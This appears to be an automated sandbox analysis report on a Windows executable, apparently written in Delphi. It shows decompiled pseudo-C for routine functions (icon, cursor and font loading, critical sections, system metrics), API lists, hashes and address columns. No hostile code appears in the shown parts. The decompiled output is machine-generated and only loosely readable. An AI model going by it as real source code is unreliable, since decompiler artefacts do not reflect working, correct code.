				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00425320(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x486b10; // 0x48702c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E004256F0(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x455e18;
				_t60 =  *0x486b10; // 0x48702c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040AC1C(0x5c, _t109);
				_t110 = _t67;
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00408B7C( &_v261, _t27);
				}
				_t69 = E0040AC44( &_v261, 0x2e, _t110);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x44c59c
				E00404588(_t31, 0x100,  &_v261);
				_t75 =  *0x486a08; // 0x487034
				if( *_t75 == 0) {
					E00454384(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E00455FF4(_t90, 0x100);
				E00456934(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403970(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                                0x0045407c
                                                                                0x0045407c
                                                                                0x00454089
                                                                                0x0045408b
                                                                                0x0045408e
                                                                                0x0045408e
                                                                                0x00454093
                                                                                0x00454096
                                                                                0x0045409c
                                                                                0x004540a1
                                                                                0x004540ab
                                                                                0x004540ad
                                                                                0x004540b2
                                                                                0x004540b5
                                                                                0x004540b5
                                                                                0x004540bb
                                                                                0x004540c0
                                                                                0x004540c5
                                                                                0x004540c7
                                                                                0x004540cc
                                                                                0x004540cf
                                                                                0x004540cf
                                                                                0x004540d5
                                                                                0x004540e5
                                                                                0x004540f7
                                                                                0x004540ff
                                                                                0x00454104
                                                                                0x0045410a
                                                                                0x00454111
                                                                                0x00454118
                                                                                0x0045411e
                                                                                0x00454124
                                                                                0x0045412b
                                                                                0x00454132
                                                                                0x00454139
                                                                                0x0045414c
                                                                                0x0045414e
                                                                                0x00454159
                                                                                0x00454161
                                                                                0x0045416a
                                                                                0x0045416f
                                                                                0x0045416f
                                                                                0x00454175
                                                                                0x00454178
                                                                                0x0045418b
                                                                                0x00454193
                                                                                0x004541a6
                                                                                0x004541b3
                                                                                0x004541b8
                                                                                0x004541ba
                                                                                0x004541bc
                                                                                0x004541c5
                                                                                0x004541c5
                                                                                0x004541d2
                                                                                0x004541d9
                                                                                0x004541db
                                                                                0x004541db
                                                                                0x004541e6
                                                                                0x004541eb
                                                                                0x004541fc
                                                                                0x00454201
                                                                                0x00454209
                                                                                0x0045420d
                                                                                0x0045420d
                                                                                0x00454212
                                                                                0x00454216
                                                                                0x0045421a
                                                                                0x0045421e
                                                                                0x00454227
                                                                                0x0045422f
                                                                                0x00454236
                                                                                0x0045423b
                                                                                0x00454241
                                                                                0x00454243
                                                                                0x00454248
                                                                                0x0045424f
                                                                                0x00454259

                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                • OemToCharA.USER32(?,?), ref: 004541A6
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: ,pH$4pH$MAINICON
                                                                                • API String ID: 3935243913-227882389
                                                                                • Opcode ID: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction ID: dc94394b66be5087aa4e9421e0b69953404944942399699dc66eb831b3e2a9c9
                                                                                • Opcode Fuzzy Hash: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction Fuzzy Hash: 375194706042449FDB40EF39C885B897BE4AB15308F4540BAEC48DF397DBB9D988CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453774, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			E00453774(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x487bfc != 0) {
					_t54 =  *0x487bfc; // 0x2291310
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x4538b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x487bfc != 0) {
					_t52 =  *0x487bfc; // 0x2291310
					E00455B88(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041ED08( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041ED08( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041EDEC( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041ED08( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041ED08( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041ED08( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041EB4C( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041EB4C( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x4538c0);
				if( *0x487bfc != 0) {
					_t38 =  *0x487bfc; // 0x2291310
					return E00455B88(_t38, _v5);
				}
				return 0;
			}






















                                                                                0x00453774
                                                                                0x00453775
                                                                                0x00453777
                                                                                0x0045377e
                                                                                0x00453780
                                                                                0x0045378b
                                                                                0x0045378d
                                                                                0x00453798
                                                                                0x00453798
                                                                                0x0045379d
                                                                                0x0045379e
                                                                                0x004537a3
                                                                                0x004537a6
                                                                                0x004537b0
                                                                                0x004537b4
                                                                                0x004537b9
                                                                                0x004537b9
                                                                                0x004537cf
                                                                                0x004537eb
                                                                                0x004537f2
                                                                                0x004537f8
                                                                                0x004537d1
                                                                                0x004537d5
                                                                                0x004537dc
                                                                                0x004537e2
                                                                                0x004537e2
                                                                                0x004537fd
                                                                                0x00453814
                                                                                0x0045381b
                                                                                0x00453851
                                                                                0x0045385c
                                                                                0x00453863
                                                                                0x0045386a
                                                                                0x00453870
                                                                                0x0045381d
                                                                                0x00453824
                                                                                0x0045382b
                                                                                0x00453831
                                                                                0x0045383d
                                                                                0x00453844
                                                                                0x0045384a
                                                                                0x0045384a
                                                                                0x00453875
                                                                                0x00453880
                                                                                0x00453885
                                                                                0x00453890
                                                                                0x0045389a
                                                                                0x0045389d
                                                                                0x004538a9
                                                                                0x004538ae
                                                                                0x00000000
                                                                                0x004538b3
                                                                                0x004538b8

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004537C8
                                                                                • CreateFontIndirectA.GDI32(?), ref: 004537D5
                                                                                • GetStockObject.GDI32(0000000D), ref: 004537EB
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00453814
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00453824
                                                                                • CreateFontIndirectA.GDI32(?), ref: 0045383D
                                                                                • GetStockObject.GDI32(0000000D), ref: 00453863
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                • String ID:
                                                                                • API String ID: 2891467149-0
                                                                                • Opcode ID: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction ID: 28a1cf3aa5b0351315609d5fbf45b2813be3316eb6b6f31c26dce7917962f236
                                                                                • Opcode Fuzzy Hash: 5009f49011f7d564ff28bd34120bc118aa850b4b66f9f7280cb06ec388a06ccd
                                                                                • Instruction Fuzzy Hash: 5731D6747042059BE740FB6ADC56B9A73E4AB04705F5480B6BD08DB3D3DE38ED488B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00452F98, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00452F98(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403918(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E0041B8BC(_t63, 0);
				_t28 =  *0x486ab0; // 0x46b458
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x45333c;
				_t29 =  *0x486abc; // 0x46b460
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x453348;
				E00453354(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403584(1);
				_t42 = E00403584(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00406E20();
				_t75 = _t42;
				L00406AF8();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407080();
				_t11 = _t62 + 0x58; // 0x44c4386e
				_t45 =  *0x486bf0; // 0x487ab0
				 *((intOrPtr*)( *_t45))(0, 0, E0044F81C,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041E978(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041E978(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041E978(1);
				E00453774(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x453650;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x453650;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x453650;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403970(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                                                                0x00452f98
                                                                                0x00452f98
                                                                                0x00452fa0
                                                                                0x00452fa2
                                                                                0x00452fa5
                                                                                0x00452fa5
                                                                                0x00452faa
                                                                                0x00452fad
                                                                                0x00452fb3
                                                                                0x00452fb8
                                                                                0x00452fbd
                                                                                0x00452fc0
                                                                                0x00452fc6
                                                                                0x00452fcb
                                                                                0x00452fce
                                                                                0x00452fd6
                                                                                0x00452fe2
                                                                                0x00452ff1
                                                                                0x00453000
                                                                                0x0045300f
                                                                                0x0045301e
                                                                                0x00453028
                                                                                0x0045302d
                                                                                0x00453032
                                                                                0x00453037
                                                                                0x0045303c
                                                                                0x00453041
                                                                                0x00453047
                                                                                0x0045304c
                                                                                0x0045305a
                                                                                0x00453061
                                                                                0x0045306f
                                                                                0x00453081
                                                                                0x00453093
                                                                                0x0045309b
                                                                                0x004530a0
                                                                                0x004530a0
                                                                                0x004530a6
                                                                                0x004530a9
                                                                                0x004530b0
                                                                                0x004530b0
                                                                                0x004530b6
                                                                                0x004530b9
                                                                                0x004530c0
                                                                                0x004530c0
                                                                                0x004530c6
                                                                                0x004530c9
                                                                                0x004530d0
                                                                                0x004530d6
                                                                                0x004530d8
                                                                                0x004530dd
                                                                                0x004530e4
                                                                                0x004530ed

                                                                                APIs
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00452FDD
                                                                                • 72E7AC50.USER32(00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00453032
                                                                                • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 0045303C
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000), ref: 00453047
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B380KeyboardLayout
                                                                                • String ID:
                                                                                • API String ID: 648844651-0
                                                                                • Opcode ID: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction ID: d6432707c957d0cacee8399d567b12e74fb03ad8e22360b452518030eba30be5
                                                                                • Opcode Fuzzy Hash: c72c351962200b131c488cf0c1afd427d9df9e7a02fae81aa34f181e99381d86
                                                                                • Instruction Fuzzy Hash: A431D9B06002419FD740EF2AD8C1B997BE4AB0535AF44C07EED18DF3A6D779A908CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401A78, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00401A78() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B2E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4875c4);
				L004013CC();
				if( *0x487049 != 0) {
					_push(0x4875c4);
					L004013D4();
				}
				E0040143C(0x4875e4);
				E0040143C(0x4875f4);
				E0040143C(0x487620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x48761c = _t11;
				if( *0x48761c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x48761c; // 0x70cc70
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x487608)) = 0x487604;
					 *0x487604 = 0x487604;
					 *0x487610 = 0x487604;
					 *0x4875bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B35);
				if( *0x487049 != 0) {
					_push(0x4875c4);
					L004013DC();
					return 0;
				}
				return 0;
			}








                                                                                0x00401a7d
                                                                                0x00401a7e
                                                                                0x00401a83
                                                                                0x00401a86
                                                                                0x00401a89
                                                                                0x00401a8e
                                                                                0x00401a9a
                                                                                0x00401a9c
                                                                                0x00401aa1
                                                                                0x00401aa1
                                                                                0x00401aab
                                                                                0x00401ab5
                                                                                0x00401abf
                                                                                0x00401acb
                                                                                0x00401ad0
                                                                                0x00401adc
                                                                                0x00401ade
                                                                                0x00401ae3
                                                                                0x00401ae3
                                                                                0x00401aeb
                                                                                0x00401aef
                                                                                0x00401af0
                                                                                0x00401afc
                                                                                0x00401aff
                                                                                0x00401b01
                                                                                0x00401b06
                                                                                0x00401b06
                                                                                0x00401b0f
                                                                                0x00401b12
                                                                                0x00401b15
                                                                                0x00401b21
                                                                                0x00401b23
                                                                                0x00401b28
                                                                                0x00000000
                                                                                0x00401b28
                                                                                0x00401b2d

                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,00401B35,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 730355536-0
                                                                                • Opcode ID: 04eb5f13794330356172df4e0205cdafae50e2a33fa04e5506ec829306f9c8c4
                                                                                • Instruction ID: 8e578660cdcaf939112aab1382d748daa181a052473268aee4a8a104828a0e1f
                                                                                • Opcode Fuzzy Hash: 04eb5f13794330356172df4e0205cdafae50e2a33fa04e5506ec829306f9c8c4
                                                                                • Instruction Fuzzy Hash: D501A1B0A4C6416EE715BB6A9826B1D7AD0D745304F608C7FE000B6AF2D7BCC440CB2D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042626C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E0042626C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x487abc == 0) {
					 *0x487a94 = E00426184(0, _t8,  *0x487a94, _t17, _t18);
					_t7 =  *0x487a94(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                                0x00426270
                                                                                0x0042627a
                                                                                0x0042628e
                                                                                0x00426294
                                                                                0x00000000
                                                                                0x00426294
                                                                                0x0042629c
                                                                                0x004262a4
                                                                                0x004262a4
                                                                                0x004262a7
                                                                                0x004262bb
                                                                                0x004262a9
                                                                                0x004262a9
                                                                                0x004262bf
                                                                                0x004262ab
                                                                                0x004262ab
                                                                                0x004262ab
                                                                                0x004262ac
                                                                                0x004262c3
                                                                                0x004262ae
                                                                                0x004262af
                                                                                0x004262b2
                                                                                0x004262b4
                                                                                0x004262b4
                                                                                0x004262b2
                                                                                0x004262ac
                                                                                0x004262a9
                                                                                0x004262c8
                                                                                0x004262cb
                                                                                0x004262d5
                                                                                0x004262cd
                                                                                0x00000000
                                                                                0x004262ce

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 004262CE
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                • KiUserCallbackDispatcher.NTDLL ref: 00426294
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                • String ID: GetSystemMetrics
                                                                                • API String ID: 54681038-96882338
                                                                                • Opcode ID: 264aa0b8b8c3a7d6db0cdf4a2c545720de1efd20539613c26ecbd5e8687bd64a
                                                                                • Instruction ID: 880e1060c297ee59ad63230c10489d7c0a575417c52aad937f933fdb4636618d
                                                                                • Opcode Fuzzy Hash: 264aa0b8b8c3a7d6db0cdf4a2c545720de1efd20539613c26ecbd5e8687bd64a
                                                                                • Instruction Fuzzy Hash: 1CF0C230718120CADA006A74BD8472B3A4A9B42320BE38FA7E521866D1C53C9905433D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402164, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00401A78: RtlInitializeCriticalSection.KERNEL32(004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401A8E
                                                                                  • Part of subcall function 00401A78: RtlEnterCriticalSection.KERNEL32(004875C4,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401AA1
                                                                                  • Part of subcall function 00401A78: LocalAlloc.KERNEL32(00000000,00000FF8,004875C4,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401ACB
                                                                                  • Part of subcall function 00401A78: RtlLeaveCriticalSection.KERNEL32(004875C4,00401B35,00000000,00401B2E,?,?,00402312,00487604,00000000,00000000,?,?,00401D01,00401D16,00401E67), ref: 00401B28
                                                                                • RtlEnterCriticalSection.KERNEL32(004875C4,00000000,004022E0), ref: 004021AF
                                                                                • RtlLeaveCriticalSection.KERNEL32(004875C4,004022E7), ref: 004022DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                • String ID:
                                                                                • API String ID: 2227675388-0
                                                                                • Opcode ID: 3fa34c09e143de6ee38679c3eec401ab6bef01278a157c997855326a3a7b96c6
                                                                                • Instruction ID: 8f138f792fd886d36dbe6593ad890a4fb3bcd0aa2eadbbda2a9f5dd5aa8ea7e6
                                                                                • Opcode Fuzzy Hash: 3fa34c09e143de6ee38679c3eec401ab6bef01278a157c997855326a3a7b96c6
                                                                                • Instruction Fuzzy Hash: AF41E3B1A086019FD714CFA9DEA962DBBA0EB54328B2449BFD401E77D1E378D801CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00453354, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00453354(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x46bbb4;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x487714; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0045340C(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                                0x00453358
                                                                                0x00453366
                                                                                0x00453369
                                                                                0x0045336e
                                                                                0x00453373
                                                                                0x00453376
                                                                                0x00453380
                                                                                0x0045338a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00453382
                                                                                0x00453382
                                                                                0x00453382
                                                                                0x00453382
                                                                                0x00453390
                                                                                0x0045339b
                                                                                0x004533a0
